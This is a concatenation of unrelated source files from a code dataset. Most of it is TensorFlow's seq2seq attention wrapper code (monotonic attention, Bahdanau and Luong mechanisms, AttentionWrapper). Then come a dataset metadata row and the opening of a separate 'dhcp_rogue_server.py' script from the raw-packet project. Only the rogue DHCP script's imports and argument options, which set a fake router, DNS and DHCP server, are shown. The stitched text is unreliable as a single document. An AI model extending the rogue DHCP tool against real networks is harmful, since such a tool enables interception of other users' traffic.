alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
with variable_scope.variable_scope(None, "bahdanau_attention", [query]):
processed_query = self.query_layer(query) if self.query_layer else query
score = _bahdanau_score(processed_query, self._keys, self._normalize)
alignments = self._probability_fn(score, state)
next_state = alignments
return alignments, next_state
def safe_cumprod(x, *args, **kwargs):
"""Computes cumprod of x in logspace using cumsum to avoid underflow.
The cumprod function and its gradient can result in numerical instabilities
when its argument has very small and/or zero values. As long as the argument
is all positive, we can instead compute the cumulative product as
exp(cumsum(log(x))). This function can be called identically to tf.cumprod.
Args:
x: Tensor to take the cumulative product of.
*args: Passed on to cumsum; these are identical to those in cumprod.
**kwargs: Passed on to cumsum; these are identical to those in cumprod.
Returns:
Cumulative product of x.
"""
with ops.name_scope(None, "SafeCumprod", [x]):
x = ops.convert_to_tensor(x, name="x")
tiny = np.finfo(x.dtype.as_numpy_dtype).tiny
return math_ops.exp(math_ops.cumsum(
math_ops.log(clip_ops.clip_by_value(x, tiny, 1)), *args, **kwargs))
def monotonic_attention(p_choose_i, previous_attention, mode):
"""Compute monotonic attention distribution from choosing probabilities.
Monotonic attention implies that the input sequence is processed in an
explicitly left-to-right manner when generating the output sequence. In
addition, once an input sequence element is attended to at a given output
timestep, elements occurring before it cannot be attended to at subsequent
output timesteps. This function generates attention distributions according
to these assumptions. For more information, see ``Online and Linear-Time
Attention by Enforcing Monotonic Alignments''.
Args:
p_choose_i: Probability of choosing input sequence/memory element i. Should
be of shape (batch_size, input_sequence_length), and should all be in the
range [0, 1].
previous_attention: The attention distribution from the previous output
timestep. Should be of shape (batch_size, input_sequence_length). For
      the first output timestep, previous_attention[n] should be [1, 0, 0, ...,
0] for all n in [0, ... batch_size - 1].
mode: How to compute the attention distribution. Must be one of
'recursive', 'parallel', or 'hard'.
* 'recursive' uses tf.scan to recursively compute the distribution.
This is slowest but is exact, general, and does not suffer from
numerical instabilities.
* 'parallel' uses parallelized cumulative-sum and cumulative-product
operations to compute a closed-form solution to the recurrence
relation defining the attention distribution. This makes it more
efficient than 'recursive', but it requires numerical checks which
make the distribution non-exact. This can be a problem in particular
when input_sequence_length is long and/or p_choose_i has entries very
close to 0 or 1.
* 'hard' requires that the probabilities in p_choose_i are all either 0
or 1, and subsequently uses a more efficient and exact solution.
Returns:
A tensor of shape (batch_size, input_sequence_length) representing the
attention distributions for each sequence in the batch.
Raises:
ValueError: mode is not one of 'recursive', 'parallel', 'hard'.
"""
# Force things to be tensors
p_choose_i = ops.convert_to_tensor(p_choose_i, name="p_choose_i")
previous_attention = ops.convert_to_tensor(
previous_attention, name="previous_attention")
if mode == "recursive":
# Use .shape[0].value when it's not None, or fall back on symbolic shape
batch_size = p_choose_i.shape[0].value or array_ops.shape(p_choose_i)[0]
# Compute [1, 1 - p_choose_i[0], 1 - p_choose_i[1], ..., 1 - p_choose_i[-2]]
shifted_1mp_choose_i = array_ops.concat(
[array_ops.ones((batch_size, 1)), 1 - p_choose_i[:, :-1]], 1)
# Compute attention distribution recursively as
    # q[i] = (1 - p_choose_i[i - 1])*q[i - 1] + previous_attention[i]
# attention[i] = p_choose_i[i]*q[i]
attention = p_choose_i*array_ops.transpose(functional_ops.scan(
# Need to use reshape to remind TF of the shape between loop iterations
lambda x, yz: array_ops.reshape(yz[0]*x + yz[1], (batch_size,)),
# Loop variables yz[0] and yz[1]
[array_ops.transpose(shifted_1mp_choose_i),
array_ops.transpose(previous_attention)],
# Initial value of x is just zeros
array_ops.zeros((batch_size,))))
elif mode == "parallel":
# safe_cumprod computes cumprod in logspace with numeric checks
cumprod_1mp_choose_i = safe_cumprod(1 - p_choose_i, axis=1, exclusive=True)
# Compute recurrence relation solution
attention = p_choose_i*cumprod_1mp_choose_i*math_ops.cumsum(
previous_attention /
# Clip cumprod_1mp to avoid divide-by-zero
clip_ops.clip_by_value(cumprod_1mp_choose_i, 1e-10, 1.), axis=1)
elif mode == "hard":
# Remove any probabilities before the index chosen last time step
p_choose_i *= math_ops.cumsum(previous_attention, axis=1)
# Now, use exclusive cumprod to remove probabilities after the first
# chosen index, like so:
# p_choose_i = [0, 0, 0, 1, 1, 0, 1, 1]
# cumprod(1 - p_choose_i, exclusive=True) = [1, 1, 1, 1, 0, 0, 0, 0]
# Product of above: [0, 0, 0, 1, 0, 0, 0, 0]
attention = p_choose_i*math_ops.cumprod(
1 - p_choose_i, axis=1, exclusive=True)
else:
raise ValueError("mode must be 'recursive', 'parallel', or 'hard'.")
return attention
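# Worked example (added for illustration; these numbers are not from the
# original source): with p_choose_i = [0.5, 0.5, 1.0] and
# previous_attention = [1, 0, 0], the recursion
#   q[i] = (1 - p_choose_i[i - 1]) * q[i - 1] + previous_attention[i]
# gives q = [1, 0.5, 0.25], so attention = p_choose_i * q = [0.5, 0.25, 0.25].
# The 'parallel' closed form reproduces the same values via cumsum/cumprod.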
def _monotonic_probability_fn(score, previous_alignments, sigmoid_noise, mode,
seed=None):
"""Attention probability function for monotonic attention.
Takes in unnormalized attention scores, adds pre-sigmoid noise to encourage
the model to make discrete attention decisions, passes them through a sigmoid
to obtain "choosing" probabilities, and then calls monotonic_attention to
obtain the attention distribution. For more information, see
Colin Raffel, Minh-Thang Luong, Peter J. Liu, Ron J. Weiss, Douglas Eck,
"Online and Linear-Time Attention by Enforcing Monotonic Alignments."
ICML 2017. https://arxiv.org/abs/1704.00784
Args:
score: Unnormalized attention scores, shape `[batch_size, alignments_size]`
previous_alignments: Previous attention distribution, shape
`[batch_size, alignments_size]`
sigmoid_noise: Standard deviation of pre-sigmoid noise. Setting this larger
than 0 will encourage the model to produce large attention scores,
effectively making the choosing probabilities discrete and the resulting
attention distribution one-hot. It should be set to 0 at test-time, and
when hard attention is not desired.
mode: How to compute the attention distribution. Must be one of
'recursive', 'parallel', or 'hard'. See the docstring for
`tf.contrib.seq2seq.monotonic_attention` for more information.
seed: (optional) Random seed for pre-sigmoid noise.
Returns:
A `[batch_size, alignments_size]`-shape tensor corresponding to the
resulting attention distribution.
"""
# Optionally add pre-sigmoid noise to the scores
if sigmoid_noise > 0:
noise = random_ops.random_normal(array_ops.shape(score), dtype=score.dtype,
seed=seed)
score += sigmoid_noise*noise
# Compute "choosing" probabilities from the attention scores
if mode == "hard":
# When mode is hard, use a hard sigmoid
p_choose_i = math_ops.cast(score > 0, score.dtype)
else:
p_choose_i = math_ops.sigmoid(score)
# Convert from choosing probabilities to attention distribution
return monotonic_attention(p_choose_i, previous_alignments, mode)
class _BaseMonotonicAttentionMechanism(_BaseAttentionMechanism):
"""Base attention mechanism for monotonic attention.
Simply overrides the initial_alignments function to provide a dirac
  distribution, which is needed in order for the monotonic attention
distributions to have the correct behavior.
"""
def initial_alignments(self, batch_size, dtype):
"""Creates the initial alignment values for the monotonic attentions.
Initializes to dirac distributions, i.e. [1, 0, 0, ...memory length..., 0]
for all entries in the batch.
Args:
batch_size: `int32` scalar, the batch_size.
dtype: The `dtype`.
Returns:
A `dtype` tensor shaped `[batch_size, alignments_size]`
(`alignments_size` is the values' `max_time`).
"""
max_time = self._alignments_size
return array_ops.one_hot(
array_ops.zeros((batch_size,), dtype=dtypes.int32), max_time,
dtype=dtype)
class BahdanauMonotonicAttention(_BaseMonotonicAttentionMechanism):
"""Monotonic attention mechanism with Bahadanau-style energy function.
This type of attention encorces a monotonic constraint on the attention
distributions; that is once the model attends to a given point in the memory
it can't attend to any prior points at subsequence output timesteps. It
achieves this by using the _monotonic_probability_fn instead of softmax to
construct its attention distributions. Since the attention scores are passed
through a sigmoid, a learnable scalar bias parameter is applied after the
score function and before the sigmoid. Otherwise, it is equivalent to
BahdanauAttention. This approach is proposed in
Colin Raffel, Minh-Thang Luong, Peter J. Liu, Ron J. Weiss, Douglas Eck,
"Online and Linear-Time Attention by Enforcing Monotonic Alignments."
ICML 2017. https://arxiv.org/abs/1704.00784
"""
def __init__(self,
num_units,
memory,
memory_sequence_length=None,
normalize=False,
score_mask_value=None,
sigmoid_noise=0.,
sigmoid_noise_seed=None,
score_bias_init=0.,
mode="parallel",
dtype=None,
name="BahdanauMonotonicAttention"):
"""Construct the Attention mechanism.
Args:
num_units: The depth of the query mechanism.
memory: The memory to query; usually the output of an RNN encoder. This
tensor should be shaped `[batch_size, max_time, ...]`.
memory_sequence_length (optional): Sequence lengths for the batch entries
in memory. If provided, the memory tensor rows are masked with zeros
for values past the respective sequence lengths.
normalize: Python boolean. Whether to normalize the energy term.
score_mask_value: (optional): The mask value for score before passing into
`probability_fn`. The default is -inf. Only used if
`memory_sequence_length` is not None.
sigmoid_noise: Standard deviation of pre-sigmoid noise. See the docstring
for `_monotonic_probability_fn` for more information.
sigmoid_noise_seed: (optional) Random seed for pre-sigmoid noise.
score_bias_init: Initial value for score bias scalar. It's recommended to
initialize this to a negative value when the length of the memory is
large.
mode: How to compute the attention distribution. Must be one of
'recursive', 'parallel', or 'hard'. See the docstring for
`tf.contrib.seq2seq.monotonic_attention` for more information.
dtype: The data type for the query and memory layers of the attention
mechanism.
name: Name to use when creating ops.
"""
# Set up the monotonic probability fn with supplied parameters
if dtype is None:
dtype = dtypes.float32
wrapped_probability_fn = functools.partial(
_monotonic_probability_fn, sigmoid_noise=sigmoid_noise, mode=mode,
seed=sigmoid_noise_seed)
super(BahdanauMonotonicAttention, self).__init__(
query_layer=layers_core.Dense(
num_units, name="query_layer", use_bias=False, dtype=dtype),
memory_layer=layers_core.Dense(
num_units, name="memory_layer", use_bias=False, dtype=dtype),
memory=memory,
probability_fn=wrapped_probability_fn,
memory_sequence_length=memory_sequence_length,
score_mask_value=score_mask_value,
name=name)
self._num_units = num_units
self._normalize = normalize
self._name = name
self._score_bias_init = score_bias_init
def __call__(self, query, state):
"""Score the query based on the keys and values.
Args:
query: Tensor of dtype matching `self.values` and shape
`[batch_size, query_depth]`.
state: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]`
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
with variable_scope.variable_scope(
None, "bahdanau_monotonic_attention", [query]):
processed_query = self.query_layer(query) if self.query_layer else query
score = _bahdanau_score(processed_query, self._keys, self._normalize)
score_bias = variable_scope.get_variable(
"attention_score_bias", dtype=processed_query.dtype,
initializer=self._score_bias_init)
score += score_bias
alignments = self._probability_fn(score, state)
next_state = alignments
return alignments, next_state
class LuongMonotonicAttention(_BaseMonotonicAttentionMechanism):
"""Monotonic attention mechanism with Luong-style energy function.
  This type of attention enforces a monotonic constraint on the attention
  distributions; that is once the model attends to a given point in the memory
  it can't attend to any prior points at subsequent output timesteps. It
achieves this by using the _monotonic_probability_fn instead of softmax to
construct its attention distributions. Otherwise, it is equivalent to
LuongAttention. This approach is proposed in
Colin Raffel, Minh-Thang Luong, Peter J. Liu, Ron J. Weiss, Douglas Eck,
"Online and Linear-Time Attention by Enforcing Monotonic Alignments."
ICML 2017. https://arxiv.org/abs/1704.00784
"""
def __init__(self,
num_units,
memory,
memory_sequence_length=None,
scale=False,
score_mask_value=None,
sigmoid_noise=0.,
sigmoid_noise_seed=None,
score_bias_init=0.,
mode="parallel",
dtype=None,
name="LuongMonotonicAttention"):
"""Construct the Attention mechanism.
Args:
num_units: The depth of the query mechanism.
memory: The memory to query; usually the output of an RNN encoder. This
tensor should be shaped `[batch_size, max_time, ...]`.
memory_sequence_length (optional): Sequence lengths for the batch entries
in memory. If provided, the memory tensor rows are masked with zeros
for values past the respective sequence lengths.
scale: Python boolean. Whether to scale the energy term.
score_mask_value: (optional): The mask value for score before passing into
`probability_fn`. The default is -inf. Only used if
`memory_sequence_length` is not None.
sigmoid_noise: Standard deviation of pre-sigmoid noise. See the docstring
for `_monotonic_probability_fn` for more information.
sigmoid_noise_seed: (optional) Random seed for pre-sigmoid noise.
score_bias_init: Initial value for score bias scalar. It's recommended to
initialize this to a negative value when the length of the memory is
large.
mode: How to compute the attention distribution. Must be one of
'recursive', 'parallel', or 'hard'. See the docstring for
`tf.contrib.seq2seq.monotonic_attention` for more information.
dtype: The data type for the query and memory layers of the attention
mechanism.
name: Name to use when creating ops.
"""
# Set up the monotonic probability fn with supplied parameters
if dtype is None:
dtype = dtypes.float32
wrapped_probability_fn = functools.partial(
_monotonic_probability_fn, sigmoid_noise=sigmoid_noise, mode=mode,
seed=sigmoid_noise_seed)
super(LuongMonotonicAttention, self).__init__(
query_layer=None,
memory_layer=layers_core.Dense(
num_units, name="memory_layer", use_bias=False, dtype=dtype),
memory=memory,
probability_fn=wrapped_probability_fn,
memory_sequence_length=memory_sequence_length,
score_mask_value=score_mask_value,
name=name)
self._num_units = num_units
self._scale = scale
self._score_bias_init = score_bias_init
self._name = name
def __call__(self, query, state):
"""Score the query based on the keys and values.
Args:
query: Tensor of dtype matching `self.values` and shape
`[batch_size, query_depth]`.
state: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]`
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
with variable_scope.variable_scope(None, "luong_monotonic_attention",
[query]):
score = _luong_score(query, self._keys, self._scale)
score_bias = variable_scope.get_variable(
"attention_score_bias", dtype=query.dtype,
initializer=self._score_bias_init)
score += score_bias
alignments = self._probability_fn(score, state)
next_state = alignments
return alignments, next_state
class AttentionWrapperState(
collections.namedtuple("AttentionWrapperState",
("cell_state", "attention", "time", "alignments",
"alignment_history", "attention_state"))):
"""`namedtuple` storing the state of a `AttentionWrapper`.
Contains:
- `cell_state`: The state of the wrapped `RNNCell` at the previous time
step.
- `attention`: The attention emitted at the previous time step.
- `time`: int32 scalar containing the current time step.
- `alignments`: A single or tuple of `Tensor`(s) containing the alignments
emitted at the previous time step for each attention mechanism.
- `alignment_history`: (if enabled) a single or tuple of `TensorArray`(s)
containing alignment matrices from all time steps for each attention
mechanism. Call `stack()` on each to convert to a `Tensor`.
- `attention_state`: A single or tuple of nested objects
containing attention mechanism state for each attention mechanism.
The objects may contain Tensors or TensorArrays.
"""
def clone(self, **kwargs):
"""Clone this object, overriding components provided by kwargs.
The new state fields' shape must match original state fields' shape. This
will be validated, and original fields' shape will be propagated to new
fields.
Example:
```python
initial_state = attention_wrapper.zero_state(dtype=..., batch_size=...)
initial_state = initial_state.clone(cell_state=encoder_state)
```
Args:
**kwargs: Any properties of the state object to replace in the returned
`AttentionWrapperState`.
Returns:
A new `AttentionWrapperState` whose properties are the same as
this one, except any overridden properties as provided in `kwargs`.
"""
def with_same_shape(old, new):
"""Check and set new tensor's shape."""
if isinstance(old, ops.Tensor) and isinstance(new, ops.Tensor):
return tensor_util.with_same_shape(old, new)
return new
return nest.map_structure(
with_same_shape,
self,
super(AttentionWrapperState, self)._replace(**kwargs))
def hardmax(logits, name=None):
"""Returns batched one-hot vectors.
The depth index containing the `1` is that of the maximum logit value.
Args:
logits: A batch tensor of logit values.
name: Name to use when creating ops.
Returns:
A batched one-hot tensor.
"""
with ops.name_scope(name, "Hardmax", [logits]):
logits = ops.convert_to_tensor(logits, name="logits")
if logits.get_shape()[-1].value is not None:
depth = logits.get_shape()[-1].value
else:
depth = array_ops.shape(logits)[-1]
return array_ops.one_hot(
math_ops.argmax(logits, -1), depth, dtype=logits.dtype)
def _compute_attention(attention_mechanism, cell_output, attention_state,
attention_layer):
"""Computes the attention and alignments for a given attention_mechanism."""
alignments, next_attention_state = attention_mechanism(
cell_output, state=attention_state)
# Reshape from [batch_size, memory_time] to [batch_size, 1, memory_time]
expanded_alignments = array_ops.expand_dims(alignments, 1)
# Context is the inner product of alignments and values along the
# memory time dimension.
# alignments shape is
# [batch_size, 1, memory_time]
# attention_mechanism.values shape is
# [batch_size, memory_time, memory_size]
# the batched matmul is over memory_time, so the output shape is
# [batch_size, 1, memory_size].
# we then squeeze out the singleton dim.
context = math_ops.matmul(expanded_alignments, attention_mechanism.values)
context = array_ops.squeeze(context, [1])
if attention_layer is not None:
attention = attention_layer(array_ops.concat([cell_output, context], 1))
else:
attention = context
return attention, alignments, next_attention_state
class AttentionWrapper(rnn_cell_impl.RNNCell):
"""Wraps another `RNNCell` with attention.
"""
def __init__(self,
cell,
attention_mechanism,
attention_layer_size=None,
alignment_history=False,
cell_input_fn=None,
output_attention=True,
initial_cell_state=None,
name=None):
"""Construct the `AttentionWrapper`.
**NOTE** If you are using the `BeamSearchDecoder` with a cell wrapped in
`AttentionWrapper`, then you must ensure that:
- The encoder output has been tiled to `beam_width` via
@{tf.contrib.seq2seq.tile_batch} (NOT `tf.tile`).
- The `batch_size` argument passed to the `zero_state` method of this
wrapper is equal to `true_batch_size * beam_width`.
- The initial state created with `zero_state` above contains a
`cell_state` value containing properly tiled final state from the
encoder.
An example:
```
tiled_encoder_outputs = tf.contrib.seq2seq.tile_batch(
encoder_outputs, multiplier=beam_width)
    tiled_encoder_final_state = tf.contrib.seq2seq.tile_batch(
encoder_final_state, multiplier=beam_width)
tiled_sequence_length = tf.contrib.seq2seq.tile_batch(
sequence_length, multiplier=beam_width)
attention_mechanism = MyFavoriteAttentionMechanism(
num_units=attention_depth,
        memory=tiled_encoder_outputs,
memory_sequence_length=tiled_sequence_length)
attention_cell = AttentionWrapper(cell, attention_mechanism, ...)
decoder_initial_state = attention_cell.zero_state(
dtype, batch_size=true_batch_size * beam_width)
decoder_initial_state = decoder_initial_state.clone(
cell_state=tiled_encoder_final_state)
```
Args:
cell: An instance of `RNNCell`.
attention_mechanism: A list of `AttentionMechanism` instances or a single
instance.
attention_layer_size: A list of Python integers or a single Python
integer, the depth of the attention (output) layer(s). If None
(default), use the context as attention at each time step. Otherwise,
feed the context and cell output into the attention layer to generate
attention at each time step. If attention_mechanism is a list,
attention_layer_size must be a list of the same length.
alignment_history: Python boolean, whether to store alignment history
from all time steps in the final output state (currently stored as a
time major `TensorArray` on which you must call `stack()`).
cell_input_fn: (optional) A `callable`. The default is:
`lambda inputs, attention: array_ops.concat([inputs, attention], -1)`.
output_attention: Python bool. If `True` (default), the output at each
time step is the attention value. This is the behavior of Luong-style
attention mechanisms. If `False`, the output at each time step is
      the output of `cell`. This is the behavior of Bahdanau-style
attention mechanisms. In both cases, the `attention` tensor is
propagated to the next time step via the state and is used there.
This flag only controls whether the attention mechanism is propagated
up to the next cell in an RNN stack or to the top RNN output.
initial_cell_state: The initial state value to use for the cell when
the user calls `zero_state()`. Note that if this value is provided
now, and the user uses a `batch_size` argument of `zero_state` which
does not match the batch size of `initial_cell_state`, proper
behavior is not guaranteed.
name: Name to use when creating ops.
Raises:
TypeError: `attention_layer_size` is not None and (`attention_mechanism`
is a list but `attention_layer_size` is not; or vice versa).
ValueError: if `attention_layer_size` is not None, `attention_mechanism`
is a list, and its length does not match that of `attention_layer_size`.
"""
super(AttentionWrapper, self).__init__(name=name)
rnn_cell_impl.assert_like_rnncell("cell", cell)
if isinstance(attention_mechanism, (list, tuple)):
self._is_multi = True
attention_mechanisms = attention_mechanism
for attention_mechanism in attention_mechanisms:
if not isinstance(attention_mechanism, AttentionMechanism):
raise TypeError(
"attention_mechanism must contain only instances of "
"AttentionMechanism, saw type: %s"
% type(attention_mechanism).__name__)
else:
self._is_multi = False
if not isinstance(attention_mechanism, AttentionMechanism):
raise TypeError(
"attention_mechanism must be an AttentionMechanism or list of "
"multiple AttentionMechanism instances, saw type: %s"
% type(attention_mechanism).__name__)
attention_mechanisms = (attention_mechanism,)
if cell_input_fn is None:
cell_input_fn = (
lambda inputs, attention: array_ops.concat([inputs, attention], -1))
else:
if not callable(cell_input_fn):
raise TypeError(
"cell_input_fn must be callable, saw type: %s"
% type(cell_input_fn).__name__)
if attention_layer_size is not None:
attention_layer_sizes = tuple(
attention_layer_size
if isinstance(attention_layer_size, (list, tuple))
else (attention_layer_size,))
if len(attention_layer_sizes) != len(attention_mechanisms):
raise ValueError(
"If provided, attention_layer_size must contain exactly one "
"integer per attention_mechanism, saw: %d vs %d"
% (len(attention_layer_sizes), len(attention_mechanisms)))
self._attention_layers = tuple(
layers_core.Dense(
attention_layer_size,
name="attention_layer",
use_bias=False,
dtype=attention_mechanisms[i].dtype)
for i, attention_layer_size in enumerate(attention_layer_sizes))
self._attention_layer_size = sum(attention_layer_sizes)
else:
self._attention_layers = None
self._attention_layer_size = sum(
attention_mechanism.values.get_shape()[-1].value
for attention_mechanism in attention_mechanisms)
self._cell = cell
self._attention_mechanisms = attention_mechanisms
self._cell_input_fn = cell_input_fn
self._output_attention = output_attention
self._alignment_history = alignment_history
with ops.name_scope(name, "AttentionWrapperInit"):
if initial_cell_state is None:
self._initial_cell_state = None
else:
final_state_tensor = nest.flatten(initial_cell_state)[-1]
state_batch_size = (
final_state_tensor.shape[0].value
or array_ops.shape(final_state_tensor)[0])
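        # Prefer the statically known batch size of the final state tensor and
        # fall back to its dynamic shape when it is unknown at graph-construction time.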
error_message = (
"When constructing AttentionWrapper %s: " % self._base_name +
"Non-matching batch sizes between the memory "
"(encoder output) and initial_cell_state. Are you using "
"the BeamSearchDecoder? You may need to tile your initial state "
"via the tf.contrib.seq2seq.tile_batch function with argument "
"multiple=beam_width.")
with ops.control_dependencies(
self._batch_size_checks(state_batch_size, error_message)):
self._initial_cell_state = nest.map_structure(
lambda s: array_ops.identity(s, name="check_initial_cell_state"),
initial_cell_state)
def _batch_size_checks(self, batch_size, error_message):
return [check_ops.assert_equal(batch_size,
attention_mechanism.batch_size,
message=error_message)
for attention_mechanism in self._attention_mechanisms]
def _item_or_tuple(self, seq):
"""Returns `seq` as tuple or the singular element.
Which is returned is determined by how the AttentionMechanism(s) were passed
to the constructor.
Args:
seq: A non-empty sequence of items or generator.
Returns:
Either the values in the sequence as a tuple if AttentionMechanism(s)
were passed to the constructor as a sequence or the singular element.
"""
t = tuple(seq)
if self._is_multi:
return t
else:
return t[0]
@property
def output_size(self):
if self._output_attention:
return self._attention_layer_size
else:
return self._cell.output_size
@property
def state_size(self):
"""The `state_size` property of `AttentionWrapper`.
Returns:
An `AttentionWrapperState` tuple containing shapes used by this object.
"""
return AttentionWrapperState(
cell_state=self._cell.state_size,
time=tensor_shape.TensorShape([]),
attention=self._attention_layer_size,
alignments=self._item_or_tuple(
a.alignments_size for a in self._attention_mechanisms),
attention_state=self._item_or_tuple(
a.state_size for a in self._attention_mechanisms),
alignment_history=self._item_or_tuple(
a.alignments_size if self._alignment_history else ()
for a in self._attention_mechanisms)) # sometimes a TensorArray
def zero_state(self, batch_size, dtype):
"""Return an initial (zero) state tuple for this `AttentionWrapper`.
**NOTE** Please see the initializer documentation for details of how
to call `zero_state` if using an `AttentionWrapper` with a
`BeamSearchDecoder`.
Args:
batch_size: `0D` integer tensor: the batch size.
dtype: The internal state data type.
Returns:
An `AttentionWrapperState` tuple containing zeroed out tensors and,
possibly, empty `TensorArray` objects.
Raises:
ValueError: (or, possibly at runtime, InvalidArgument), if
`batch_size` does not match the output size of the encoder passed
to the wrapper object at initialization time.
"""
with ops.name_scope(type(self).__name__ + "ZeroState", values=[batch_size]):
if self._initial_cell_state is not None:
cell_state = self._initial_cell_state
else:
cell_state = self._cell.zero_state(batch_size, dtype)
error_message = (
"When calling zero_state of AttentionWrapper %s: " % self._base_name +
"Non-matching batch sizes between the memory "
"(encoder output) and the requested batch size. Are you using "
"the BeamSearchDecoder? If so, make sure your encoder output has "
"been tiled to beam_width via tf.contrib.seq2seq.tile_batch, and "
"the batch_size= argument passed to zero_state is "
"batch_size * beam_width.")
with ops.control_dependencies(
self._batch_size_checks(batch_size, error_message)):
cell_state = nest.map_structure(
lambda s: array_ops.identity(s, name="checked_cell_state"),
cell_state)
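      # All-zero initial alignments, one per attention mechanism; these also supply
      # the element shape for the optional alignment-history TensorArrays below.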
initial_alignments = [
attention_mechanism.initial_alignments(batch_size, dtype)
for attention_mechanism in self._attention_mechanisms]
return AttentionWrapperState(
cell_state=cell_state,
time=array_ops.zeros([], dtype=dtypes.int32),
attention=_zero_state_tensors(self._attention_layer_size, batch_size,
dtype),
alignments=self._item_or_tuple(initial_alignments),
attention_state=self._item_or_tuple(
attention_mechanism.initial_state(batch_size, dtype)
for attention_mechanism in self._attention_mechanisms),
alignment_history=self._item_or_tuple(
tensor_array_ops.TensorArray(
dtype,
size=0,
dynamic_size=True,
element_shape=alignment.shape)
if self._alignment_history else ()
for alignment in initial_alignments))
def call(self, inputs, state):
"""Perform a step of attention-wrapped RNN.
- Step 1: Mix the `inputs` and previous step's `attention` output via
`cell_input_fn`.
- Step 2: Call the wrapped `cell` with this input and its previous state.
- Step 3: Score the cell's output with `attention_mechanism`.
- Step 4: Calculate the alignments by passing the score through the
`normalizer`.
- Step 5: Calculate the context vector as the inner product between the
alignments and the attention_mechanism's values (memory).
- Step 6: Calculate the attention output by concatenating the cell output
and context through the attention layer (a linear layer with
`attention_layer_size` outputs).
Args:
inputs: (Possibly nested tuple of) Tensor, the input at this time step.
state: An instance of `AttentionWrapperState` containing
tensors from the previous time step.
Returns:
A tuple `(attention_or_cell_output, next_state)`, where:
- `attention_or_cell_output` depending on `output_attention`.
- `next_state` is an instance of `AttentionWrapperState`
containing the state calculated at this time step.
Raises:
TypeError: If `state` is not an instance of `AttentionWrapperState`.
"""
if not isinstance(state, AttentionWrapperState):
raise TypeError("Expected state to be instance of AttentionWrapperState. "
"Received type %s instead." % type(state))
# Step 1: Calculate the true inputs to the cell based on the
# previous attention value.
cell_inputs = self._cell_input_fn(inputs, state.attention)
cell_state = state.cell_state
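    # Step 2: Call the wrapped cell with the mixed inputs and its previous state.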
cell_output, next_cell_state = self._cell(cell_inputs, cell_state)
cell_batch_size = (
cell_output.shape[0].value or array_ops.shape(cell_output)[0])
error_message = (
"When applying AttentionWrapper %s: " % self.name +
"Non-matching batch sizes between the memory "
"(encoder output) and the query (decoder output). Are you using "
"the BeamSearchDecoder? You may need to tile your memory input via "
"the tf.contrib.seq2seq.tile_batch function with argument "
"multiple=beam_width.")
with ops.control_dependencies(
self._batch_size_checks(cell_batch_size, error_message)):
cell_output = array_ops.identity(
cell_output, name="checked_cell_output")
if self._is_multi:
previous_attention_state = state.attention_state
previous_alignment_history = state.alignment_history
else:
previous_attention_state = [state.attention_state]
previous_alignment_history = [state.alignment_history]
all_alignments = []
all_attentions = []
all_attention_states = []
maybe_all_histories = []
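    # Steps 3-6 happen inside _compute_attention for each mechanism: score the cell
    # output, normalize the scores into alignments, form the context vector, and
    # (if configured) pass cell output and context through the attention layer.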
for i, attention_mechanism in enumerate(self._attention_mechanisms):
attention, alignments, next_attention_state = _compute_attention(
attention_mechanism, cell_output, previous_attention_state[i],
self._attention_layers[i] if self._attention_layers else None)
alignment_history = previous_alignment_history[i].write(
state.time, alignments) if self._alignment_history else ()
all_attention_states.append(next_attention_state)
all_alignments.append(alignments)
all_attentions.append(attention)
maybe_all_histories.append(alignment_history)
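    # Concatenate the per-mechanism attention vectors into this step's attention output.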
attention = array_ops.concat(all_attentions, 1)
next_state = AttentionWrapperState(
time=state.time + 1,
cell_state=next_cell_state,
attention=attention,
attention_state=self._item_or_tuple(all_attention_states),
alignments=self._item_or_tuple(all_alignments),
alignment_history=self._item_or_tuple(maybe_all_histories))
if self._output_attention:
return attention, next_state
else:
return cell_output, next_state
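# Illustrative usage sketch (added for clarity; not part of the original module, and
# names such as `encoder_outputs`, `decoder_cell` and `source_lengths` are assumptions):
#   mechanism = LuongAttention(num_units, memory=encoder_outputs,
#                              memory_sequence_length=source_lengths)
#   attn_cell = AttentionWrapper(decoder_cell, mechanism,
#                                attention_layer_size=num_units)
#   state = attn_cell.zero_state(batch_size, dtypes.float32)
#   output, state = attn_cell(decoder_inputs_t, state)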
| apache-2.0 | -8,393,192,901,681,401,000 | 40.782821 | 94 | 0.670449 | false | 3.934828 | false | false | false |
Vladimir-Ivanov-Git/raw-packet | Scripts/DHCP/dhcp_rogue_server.py | 1 | 47873 | #!/usr/bin/env python
# region Import
from sys import path
from os.path import dirname, abspath
project_root_path = dirname(dirname(dirname(abspath(__file__))))
utils_path = project_root_path + "/Utils/"
path.append(utils_path)
from base import Base
from network import Ethernet_raw, ARP_raw, IP_raw, UDP_raw, DHCP_raw
from tm import ThreadManager
from scanner import Scanner
from sys import exit
from argparse import ArgumentParser
from ipaddress import IPv4Address
from socket import socket, AF_PACKET, SOCK_RAW, htons
from os import errno, makedirs
from shutil import copyfile
from base64 import b64encode
from netaddr import IPAddress
from time import sleep
from random import randint
import subprocess as sub
# endregion
# region Check user, platform and create threads
Base = Base()
Scanner = Scanner()
Base.check_user()
Base.check_platform()
tm = ThreadManager(3)
# endregion
# region Parse script arguments
parser = ArgumentParser(description='DHCP Rogue server')
parser.add_argument('-i', '--interface', help='Set interface name for send reply packets')
parser.add_argument('-f', '--first_offer_ip', type=str, help='Set first client ip for offering', default=None)
parser.add_argument('-l', '--last_offer_ip', type=str, help='Set last client ip for offering', default=None)
parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None)
parser.add_argument('-T', '--target_ip', type=str, help='Set client IP address with MAC in --target_mac', default=None)
parser.add_argument('-m', '--netmask', type=str, help='Set network mask', default=None)
parser.add_argument('--dhcp_mac', type=str, help='Set DHCP server MAC address, if not set use your MAC address', default=None)
parser.add_argument('--dhcp_ip', type=str, help='Set DHCP server IP address, if not set use your IP address', default=None)
parser.add_argument('--router', type=str, help='Set router IP address, if not set use your ip address', default=None)
parser.add_argument('--dns', type=str, help='Set DNS server IP address, if not set use your ip address', default=None)
parser.add_argument('--tftp', type=str, help='Set TFTP server IP address', default=None)
parser.add_argument('--wins', type=str, help='Set WINS server IP address', default=None)
